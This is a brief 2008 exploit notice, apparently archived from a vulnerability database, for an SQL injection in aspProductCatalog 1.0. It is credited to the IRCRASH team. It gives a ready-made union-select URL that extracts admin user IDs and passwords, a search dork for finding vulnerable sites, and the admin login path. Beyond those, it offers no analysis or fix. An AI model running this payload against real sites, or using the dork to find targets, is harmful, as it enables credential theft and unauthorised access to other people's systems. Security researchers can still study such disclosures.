aspProductCatalog Sql Injection

2008-12-14T00:00:00
ID SECURITYVULNS:DOC:21014
Type securityvulns
Reporter Securityvulns
Modified 2008-12-14T00:00:00

Description

aspProductCatalog Sql Injection

AUTHOR : Sina Yazdanmehr (R3d.W0rm)

Discovered by : Sina Yazdanmehr (R3d.W0rm)

Our Site : Http://IRCRASH.COM

IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi

Download : http://heanet.dl.sourceforge.net/sourceforge/aspprocatalog/aspProductCatalogv1.0.zip

DORK : "Powered by ASP Product Catalog" inurl:default.asp

[Sql Injection]

http://Site/default.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin

[Admin Panel]

http://Site/admin/login.asp

Site : Http://IRCRASH.COM

################################ TNX GOD